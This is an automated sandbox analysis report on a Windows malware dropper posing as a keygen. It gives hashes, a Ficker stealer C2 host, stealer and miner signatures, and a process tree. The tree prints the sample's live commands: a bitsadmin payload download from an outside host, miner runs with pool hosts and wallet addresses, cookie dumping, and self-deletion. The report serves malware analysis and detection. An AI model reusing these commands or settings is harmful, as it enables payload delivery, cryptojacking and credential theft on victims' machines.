Resubmissions

08-07-2021 12:18

210708-8z6d5h8z2n 10

06-07-2021 17:53

210706-g6we6sa7sa 10

19-06-2021 18:17

210619-vr8bj2dzfn 10

17-06-2021 21:39

210617-a9cvlnmrbx 10

11-06-2021 17:26

210611-wvab1yw2tj 10

08-06-2021 06:47

210608-qrbpch3y46 10

08-06-2021 06:47

210608-64tndgm1ln 10

05-06-2021 18:40

210605-cd6qpr55sx 10

04-06-2021 11:56

210604-5c416rs3ns 10

04-06-2021 08:52

210604-jy9885jen2 10

Analysis

  • max time kernel
    1800s
  • max time network
    1774s
  • platform
    windows10_x64
  • resource
    win10v20210410
  • submitted
    25-04-2021 09:56

General

  • Target

    keygen-step-4d.exe

  • Size

    4.6MB

  • MD5

    563107b1df2a00f4ec868acd9e08a205

  • SHA1

    9cb9c91d66292f5317aa50d92e38834861e9c9b7

  • SHA256

    bf2bd257dde4921ce83c7c1303fafe7f9f81e53c2775d3c373ced482b22eb8a9

  • SHA512

    99a8d247fa435c4cd95be7bc64c7dd6e382371f3a3c160aac3995fd705e4fd3f6622c23784a4ae3457c87536347d15eda3f08aa616450778a99376df540d74d1

Malware Config

Extracted

Family

fickerstealer

C2

sodaandcoke.top:80

Signatures

  • DcRat

    DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • fickerstealer

    Ficker is an infostealer written in Rust and ASM.

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

  • XMRig Miner Payload 2 IoCs
  • Blocklisted process makes network request 17 IoCs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 1 IoCs
  • Executes dropped EXE 45 IoCs
  • UPX packed file 2 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 64 IoCs
  • Reads local data of messenger clients 2 TTPs

    Infostealers often target stored data of messaging applications, which can include saved credentials and account information.

  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 4 IoCs
  • Checks for any installed AV software in registry 1 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 2 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 3 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 10 IoCs
  • Suspicious use of SetThreadContext 7 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 8 IoCs
  • NSIS installer 2 IoCs
  • Checks SCSI registry key(s) 3 TTPs 18 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 4 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Download via BitsAdmin 1 TTPs 1 IoCs
  • Kills process with taskkill 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 4 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 64 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 46 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 5 IoCs
  • Suspicious use of SetWindowsHookEx 10 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
    1⤵
      PID:1072
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s Themes
      1⤵
        PID:1172
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s SENS
        1⤵
          PID:1392
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
          1⤵
            PID:1860
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s Browser
            1⤵
              PID:2740
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s WpnService
              1⤵
              • Modifies registry class
              PID:2720
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
              1⤵
              • Suspicious use of AdjustPrivilegeToken
              PID:2700
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
              1⤵
                PID:2436
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
                1⤵
                • Suspicious use of AdjustPrivilegeToken
                PID:2408
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k netsvcs -s UserManager
                1⤵
                  PID:1360
                • c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k netsvcs -s Schedule
                  1⤵
                  • Drops file in System32 directory
                  PID:860
                  • C:\Users\Admin\AppData\Roaming\jsdjbsd
                    C:\Users\Admin\AppData\Roaming\jsdjbsd
                    2⤵
                    • Executes dropped EXE
                    • Checks SCSI registry key(s)
                    • Suspicious behavior: MapViewOfSection
                    PID:6052
                  • C:\Users\Admin\AppData\Roaming\twdjbsd
                    C:\Users\Admin\AppData\Roaming\twdjbsd
                    2⤵
                    • Executes dropped EXE
                    • Suspicious use of SetThreadContext
                    PID:348
                    • C:\Users\Admin\AppData\Roaming\twdjbsd
                      C:\Users\Admin\AppData\Roaming\twdjbsd
                      3⤵
                      • Executes dropped EXE
                      • Checks SCSI registry key(s)
                      • Suspicious behavior: MapViewOfSection
                      PID:5024
                  • C:\Users\Admin\AppData\Roaming\jsdjbsd
                    C:\Users\Admin\AppData\Roaming\jsdjbsd
                    2⤵
                    • Executes dropped EXE
                    • Checks SCSI registry key(s)
                    • Suspicious behavior: MapViewOfSection
                    PID:5112
                  • C:\Users\Admin\AppData\Roaming\twdjbsd
                    C:\Users\Admin\AppData\Roaming\twdjbsd
                    2⤵
                    • Executes dropped EXE
                    • Suspicious use of SetThreadContext
                    PID:4768
                    • C:\Users\Admin\AppData\Roaming\twdjbsd
                      C:\Users\Admin\AppData\Roaming\twdjbsd
                      3⤵
                      • Executes dropped EXE
                      • Checks SCSI registry key(s)
                      • Suspicious behavior: MapViewOfSection
                      PID:3984
                  • C:\Users\Admin\AppData\Roaming\jsdjbsd
                    C:\Users\Admin\AppData\Roaming\jsdjbsd
                    2⤵
                    • Executes dropped EXE
                    PID:4640
                  • C:\Users\Admin\AppData\Roaming\twdjbsd
                    C:\Users\Admin\AppData\Roaming\twdjbsd
                    2⤵
                    • Executes dropped EXE
                    PID:388
                • c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
                  1⤵
                    PID:992
                  • C:\Users\Admin\AppData\Local\Temp\keygen-step-4d.exe
                    "C:\Users\Admin\AppData\Local\Temp\keygen-step-4d.exe"
                    1⤵
                    • Checks computer location settings
                    • Suspicious use of WriteProcessMemory
                    PID:2184
                    • C:\Users\Admin\AppData\Local\Temp\RarSFX0\xiuhuali.exe
                      "C:\Users\Admin\AppData\Local\Temp\RarSFX0\xiuhuali.exe"
                      2⤵
                      • Executes dropped EXE
                      • Suspicious use of SetWindowsHookEx
                      • Suspicious use of WriteProcessMemory
                      PID:2444
                      • C:\Windows\SysWOW64\rundll32.exe
                        "C:\Windows\System32\rundll32.exe" "C:\Program Files\install.dll",install
                        3⤵
                        • Loads dropped DLL
                        • Modifies registry class
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        • Suspicious use of WriteProcessMemory
                        PID:3456
                    • C:\Users\Admin\AppData\Local\Temp\RarSFX0\JoSetp.exe
                      "C:\Users\Admin\AppData\Local\Temp\RarSFX0\JoSetp.exe"
                      2⤵
                      • Executes dropped EXE
                      • Suspicious use of AdjustPrivilegeToken
                      PID:3116
                    • C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe
                      "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe"
                      2⤵
                      • Executes dropped EXE
                      • Suspicious use of WriteProcessMemory
                      PID:4468
                      • C:\Users\Admin\AppData\Local\Temp\is-D6GOF.tmp\Install.tmp
                        "C:\Users\Admin\AppData\Local\Temp\is-D6GOF.tmp\Install.tmp" /SL5="$401A6,235791,152064,C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe"
                        3⤵
                        • Executes dropped EXE
                        • Loads dropped DLL
                        • Suspicious use of WriteProcessMemory
                        PID:4500
                        • C:\Users\Admin\AppData\Local\Temp\is-7BT72.tmp\Ultra.exe
                          "C:\Users\Admin\AppData\Local\Temp\is-7BT72.tmp\Ultra.exe" /S /UID=burnerch1
                          4⤵
                          • Drops file in Drivers directory
                          • Executes dropped EXE
                          • Adds Run key to start application
                          • Drops file in Program Files directory
                          • Suspicious use of AdjustPrivilegeToken
                          • Suspicious use of WriteProcessMemory
                          PID:4576
                          • C:\Program Files\Windows Photo Viewer\DZUIUASTIH\ultramediaburner.exe
                            "C:\Program Files\Windows Photo Viewer\DZUIUASTIH\ultramediaburner.exe" /VERYSILENT
                            5⤵
                            • Executes dropped EXE
                            • Suspicious use of WriteProcessMemory
                            PID:4788
                            • C:\Users\Admin\AppData\Local\Temp\is-2NFUV.tmp\ultramediaburner.tmp
                              "C:\Users\Admin\AppData\Local\Temp\is-2NFUV.tmp\ultramediaburner.tmp" /SL5="$501E0,281924,62464,C:\Program Files\Windows Photo Viewer\DZUIUASTIH\ultramediaburner.exe" /VERYSILENT
                              6⤵
                              • Executes dropped EXE
                              • Drops file in Program Files directory
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious use of FindShellTrayWindow
                              • Suspicious use of WriteProcessMemory
                              PID:4820
                              • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
                                7⤵
                                • Executes dropped EXE
                                PID:4864
                          • C:\Users\Admin\AppData\Local\Temp\d4-3c1cd-63e-d1299-a664068008e90\Qitucuxyno.exe
                            "C:\Users\Admin\AppData\Local\Temp\d4-3c1cd-63e-d1299-a664068008e90\Qitucuxyno.exe"
                            5⤵
                            • Executes dropped EXE
                            • Checks computer location settings
                            • Suspicious use of AdjustPrivilegeToken
                            PID:4876
                          • C:\Users\Admin\AppData\Local\Temp\62-567d9-7df-8539e-8523d32028b7a\Kogaexaebisi.exe
                            "C:\Users\Admin\AppData\Local\Temp\62-567d9-7df-8539e-8523d32028b7a\Kogaexaebisi.exe"
                            5⤵
                            • Executes dropped EXE
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious use of AdjustPrivilegeToken
                            • Suspicious use of WriteProcessMemory
                            PID:4948
                            • C:\Windows\System32\cmd.exe
                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\k4wc2xaq.02e\instEU.exe & exit
                              6⤵
                              • Suspicious use of WriteProcessMemory
                              PID:4556
                              • C:\Users\Admin\AppData\Local\Temp\k4wc2xaq.02e\instEU.exe
                                C:\Users\Admin\AppData\Local\Temp\k4wc2xaq.02e\instEU.exe
                                7⤵
                                • Executes dropped EXE
                                PID:3328
                            • C:\Windows\System32\cmd.exe
                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\5pkkghy4.zbd\google-game.exe & exit
                              6⤵
                                PID:3392
                                • C:\Users\Admin\AppData\Local\Temp\5pkkghy4.zbd\google-game.exe
                                  C:\Users\Admin\AppData\Local\Temp\5pkkghy4.zbd\google-game.exe
                                  7⤵
                                  • Executes dropped EXE
                                  • Suspicious use of SetWindowsHookEx
                                  PID:4480
                                  • C:\Windows\SysWOW64\rundll32.exe
                                    "C:\Windows\System32\rundll32.exe" "C:\Program Files\install.dll",install
                                    8⤵
                                      PID:4564
                                • C:\Windows\System32\cmd.exe
                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\mhr2dacy.qqs\md1_1eaf.exe & exit
                                  6⤵
                                    PID:5556
                                    • C:\Users\Admin\AppData\Local\Temp\mhr2dacy.qqs\md1_1eaf.exe
                                      C:\Users\Admin\AppData\Local\Temp\mhr2dacy.qqs\md1_1eaf.exe
                                      7⤵
                                      • Executes dropped EXE
                                      • Checks whether UAC is enabled
                                      PID:5744
                                  • C:\Windows\System32\cmd.exe
                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\xcmvs4jz.zjz\askinstall39.exe & exit
                                    6⤵
                                      PID:4768
                                      • C:\Users\Admin\AppData\Local\Temp\xcmvs4jz.zjz\askinstall39.exe
                                        C:\Users\Admin\AppData\Local\Temp\xcmvs4jz.zjz\askinstall39.exe
                                        7⤵
                                        • Executes dropped EXE
                                        PID:2224
                                        • C:\Windows\SysWOW64\cmd.exe
                                          cmd.exe /c taskkill /f /im chrome.exe
                                          8⤵
                                            PID:4424
                                            • C:\Windows\SysWOW64\taskkill.exe
                                              taskkill /f /im chrome.exe
                                              9⤵
                                              • Kills process with taskkill
                                              PID:4896
                                      • C:\Windows\System32\cmd.exe
                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\qs0nw4vr.00f\inst.exe & exit
                                        6⤵
                                          PID:2004
                                          • C:\Users\Admin\AppData\Local\Temp\qs0nw4vr.00f\inst.exe
                                            C:\Users\Admin\AppData\Local\Temp\qs0nw4vr.00f\inst.exe
                                            7⤵
                                            • Executes dropped EXE
                                            PID:4784
                                        • C:\Windows\System32\cmd.exe
                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\mtyz1ub2.2tp\SunLabsPlayer.exe /S & exit
                                          6⤵
                                            PID:4116
                                            • C:\Users\Admin\AppData\Local\Temp\mtyz1ub2.2tp\SunLabsPlayer.exe
                                              C:\Users\Admin\AppData\Local\Temp\mtyz1ub2.2tp\SunLabsPlayer.exe /S
                                              7⤵
                                              • Executes dropped EXE
                                              • Loads dropped DLL
                                              • Drops file in Program Files directory
                                              PID:5060
                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nseF748.tmp\tempfile.ps1"
                                                8⤵
                                                  PID:348
                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nseF748.tmp\tempfile.ps1"
                                                  8⤵
                                                    PID:4796
                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nseF748.tmp\tempfile.ps1"
                                                    8⤵
                                                      PID:2220
                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nseF748.tmp\tempfile.ps1"
                                                      8⤵
                                                        PID:5892
                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nseF748.tmp\tempfile.ps1"
                                                        8⤵
                                                          PID:4888
                                                          • C:\Windows\System32\Conhost.exe
                                                            \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            9⤵
                                                            • Loads dropped DLL
                                                            • Modifies registry class
                                                            PID:4564
                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nseF748.tmp\tempfile.ps1"
                                                          8⤵
                                                            PID:6132
                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nseF748.tmp\tempfile.ps1"
                                                            8⤵
                                                            • Checks for any installed AV software in registry
                                                            PID:5476
                                                          • C:\Windows\SysWOW64\bitsadmin.exe
                                                            "bitsadmin" /Transfer helper http://sunlabsinternational.com/data/data.7z C:\zip.7z
                                                            8⤵
                                                            • Download via BitsAdmin
                                                            PID:5796
                                                          • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                            "C:\Program Files (x86)\lighteningplayer\data_load.exe" -pQGiWRM0rcPUBXqC -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                            8⤵
                                                            • Executes dropped EXE
                                                            • Drops file in Program Files directory
                                                            PID:4528
                                                          • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                            "C:\Program Files (x86)\lighteningplayer\data_load.exe" -pA4ibSiETYDLITxK -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                            8⤵
                                                            • Executes dropped EXE
                                                            PID:5836
                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nseF748.tmp\tempfile.ps1"
                                                            8⤵
                                                              PID:1124
                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nseF748.tmp\tempfile.ps1"
                                                              8⤵
                                                                PID:1764
                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nseF748.tmp\tempfile.ps1"
                                                                8⤵
                                                                  PID:4268
                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nseF748.tmp\tempfile.ps1"
                                                                  8⤵
                                                                    PID:4704
                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nseF748.tmp\tempfile.ps1"
                                                                    8⤵
                                                                      PID:5632
                                                                    • C:\Windows\SysWOW64\rundll32.exe
                                                                      C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\uWObqeM\uWObqeM.dll" uWObqeM
                                                                      8⤵
                                                                      • Executes dropped EXE
                                                                      • Loads dropped DLL
                                                                      • Suspicious use of SetThreadContext
                                                                      PID:4664
                                                                      • C:\Windows\system32\rundll32.exe
                                                                        C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\uWObqeM\uWObqeM.dll" uWObqeM
                                                                        9⤵
                                                                        • Loads dropped DLL
                                                                        • Drops file in System32 directory
                                                                        • Drops file in Program Files directory
                                                                        PID:364
                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nseF748.tmp\tempfile.ps1"
                                                                      8⤵
                                                                        PID:4492
                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nseF748.tmp\tempfile.ps1"
                                                                        8⤵
                                                                          PID:4436
                                                                          • C:\Windows\System32\Conhost.exe
                                                                            \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                            9⤵
                                                                              PID:5892
                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nseF748.tmp\tempfile.ps1"
                                                                            8⤵
                                                                              PID:2876
                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nseF748.tmp\tempfile.ps1"
                                                                              8⤵
                                                                                PID:3548
                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nseF748.tmp\tempfile.ps1"
                                                                                8⤵
                                                                                • Blocklisted process makes network request
                                                                                PID:5928
                                                                              • C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe
                                                                                "C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe" C:\Program Files (x86)\lighteningplayer\plugins\ /SILENT
                                                                                8⤵
                                                                                • Executes dropped EXE
                                                                                • Loads dropped DLL
                                                                                PID:3852
                                                                          • C:\Windows\System32\cmd.exe
                                                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\dcqisxsu.t40\GcleanerWW.exe /mixone & exit
                                                                            6⤵
                                                                              PID:4492
                                                                            • C:\Windows\System32\cmd.exe
                                                                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\nasgge3k.sv0\toolspab1.exe & exit
                                                                              6⤵
                                                                                PID:4416
                                                                                • C:\Users\Admin\AppData\Local\Temp\nasgge3k.sv0\toolspab1.exe
                                                                                  C:\Users\Admin\AppData\Local\Temp\nasgge3k.sv0\toolspab1.exe
                                                                                  7⤵
                                                                                  • Executes dropped EXE
                                                                                  • Suspicious use of SetThreadContext
                                                                                  PID:4316
                                                                                  • C:\Users\Admin\AppData\Local\Temp\nasgge3k.sv0\toolspab1.exe
                                                                                    C:\Users\Admin\AppData\Local\Temp\nasgge3k.sv0\toolspab1.exe
                                                                                    8⤵
                                                                                    • Executes dropped EXE
                                                                                    • Loads dropped DLL
                                                                                    • Checks SCSI registry key(s)
                                                                                    • Suspicious behavior: MapViewOfSection
                                                                                    PID:1444
                                                                              • C:\Windows\System32\cmd.exe
                                                                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\h3ln4v0m.xcd\c7ae36fa.exe & exit
                                                                                6⤵
                                                                                  PID:5216
                                                                                  • C:\Users\Admin\AppData\Local\Temp\h3ln4v0m.xcd\c7ae36fa.exe
                                                                                    C:\Users\Admin\AppData\Local\Temp\h3ln4v0m.xcd\c7ae36fa.exe
                                                                                    7⤵
                                                                                    • Executes dropped EXE
                                                                                    • Loads dropped DLL
                                                                                    • Checks SCSI registry key(s)
                                                                                    • Suspicious behavior: MapViewOfSection
                                                                                    PID:4468
                                                                                • C:\Windows\System32\cmd.exe
                                                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\zcyacclu.rfc\app.exe /8-2222 & exit
                                                                                  6⤵
                                                                                    PID:5152
                                                                                    • C:\Windows\System32\Conhost.exe
                                                                                      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      7⤵
                                                                                        PID:4768
                                                                                      • C:\Users\Admin\AppData\Local\Temp\zcyacclu.rfc\app.exe
                                                                                        C:\Users\Admin\AppData\Local\Temp\zcyacclu.rfc\app.exe /8-2222
                                                                                        7⤵
                                                                                        • Executes dropped EXE
                                                                                        PID:5984
                                                                                        • C:\Users\Admin\AppData\Local\Temp\zcyacclu.rfc\app.exe
                                                                                          "C:\Users\Admin\AppData\Local\Temp\zcyacclu.rfc\app.exe" /8-2222
                                                                                          8⤵
                                                                                          • Executes dropped EXE
                                                                                          • Modifies data under HKEY_USERS
                                                                                          PID:5084
                                                                            • C:\Users\Admin\AppData\Local\Temp\RarSFX0\filee.exe
                                                                              "C:\Users\Admin\AppData\Local\Temp\RarSFX0\filee.exe"
                                                                              2⤵
                                                                                PID:5052
                                                                                • C:\Users\Admin\AppData\Roaming\5C7D.tmp.exe
                                                                                  "C:\Users\Admin\AppData\Roaming\5C7D.tmp.exe"
                                                                                  3⤵
                                                                                    PID:4664
                                                                                    • C:\Users\Admin\AppData\Roaming\5C7D.tmp.exe
                                                                                      "C:\Users\Admin\AppData\Roaming\5C7D.tmp.exe"
                                                                                      4⤵
                                                                                      • Executes dropped EXE
                                                                                      • Checks processor information in registry
                                                                                      PID:5348
                                                                                  • C:\Users\Admin\AppData\Roaming\6151.tmp.exe
                                                                                    "C:\Users\Admin\AppData\Roaming\6151.tmp.exe"
                                                                                    3⤵
                                                                                    • Executes dropped EXE
                                                                                    • Adds Run key to start application
                                                                                    • Suspicious use of SetThreadContext
                                                                                    • Suspicious use of WriteProcessMemory
                                                                                    PID:4620
                                                                                    • C:\Windows\system32\msiexec.exe
                                                                                      -P stratum1+ssl://0xb7633a80145Ec9ce2b8b5F80AB36C783064C2E10.w31792@eu-eth.hiveon.net:24443 -R --response-timeout 30 --farm-retries 99999
                                                                                      4⤵
                                                                                        PID:5036
                                                                                      • C:\Windows\system32\msiexec.exe
                                                                                        -o pool.supportxmr.com:8080 -u 47wDrszce6VbnMB4zhhEA1Gr3EzwHx2eS6QzC5sFoq8iGdMjnzX8bnEjBdQHsAuW8C1SNgxyGa4DQTVnQ9jfhRod73np5P8.w1275 --cpu-max-threads-hint 50 -r 9999
                                                                                        4⤵
                                                                                        • Blocklisted process makes network request
                                                                                        • Executes dropped EXE
                                                                                        • Suspicious use of WriteProcessMemory
                                                                                        PID:5052
                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                      "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX0\filee.exe"
                                                                                      3⤵
                                                                                        PID:4508
                                                                                        • C:\Windows\SysWOW64\PING.EXE
                                                                                          ping 127.0.0.1
                                                                                          4⤵
                                                                                          • Runs ping.exe
                                                                                          PID:5168
                                                                                    • C:\Users\Admin\AppData\Local\Temp\RarSFX0\jg6_6asg.exe
                                                                                      "C:\Users\Admin\AppData\Local\Temp\RarSFX0\jg6_6asg.exe"
                                                                                      2⤵
                                                                                      • Executes dropped EXE
                                                                                      • Checks whether UAC is enabled
                                                                                      PID:5708
                                                                                    • C:\Users\Admin\AppData\Local\Temp\RarSFX0\gaoou.exe
                                                                                      "C:\Users\Admin\AppData\Local\Temp\RarSFX0\gaoou.exe"
                                                                                      2⤵
                                                                                      • Executes dropped EXE
                                                                                      • Adds Run key to start application
                                                                                      PID:3268
                                                                                      • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                        3⤵
                                                                                        • Executes dropped EXE
                                                                                        PID:5540
                                                                                      • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                        3⤵
                                                                                        • Executes dropped EXE
                                                                                        PID:5208
                                                                                      • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                        3⤵
                                                                                        • Executes dropped EXE
                                                                                        PID:4164
                                                                                      • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                        3⤵
                                                                                        • Executes dropped EXE
                                                                                        PID:4564
                                                                                  • \??\c:\windows\system32\svchost.exe
                                                                                    c:\windows\system32\svchost.exe -k netsvcs -s BITS
                                                                                    1⤵
                                                                                    • Suspicious use of SetThreadContext
                                                                                    • Modifies data under HKEY_USERS
                                                                                    • Modifies registry class
                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                    • Suspicious use of WriteProcessMemory
                                                                                    PID:2484
                                                                                    • C:\Windows\system32\svchost.exe
                                                                                      C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                      2⤵
                                                                                      • Drops file in System32 directory
                                                                                      • Checks processor information in registry
                                                                                      • Modifies data under HKEY_USERS
                                                                                      PID:3936
                                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                    1⤵
                                                                                    • Drops file in Windows directory
                                                                                    • Modifies Internet Explorer settings
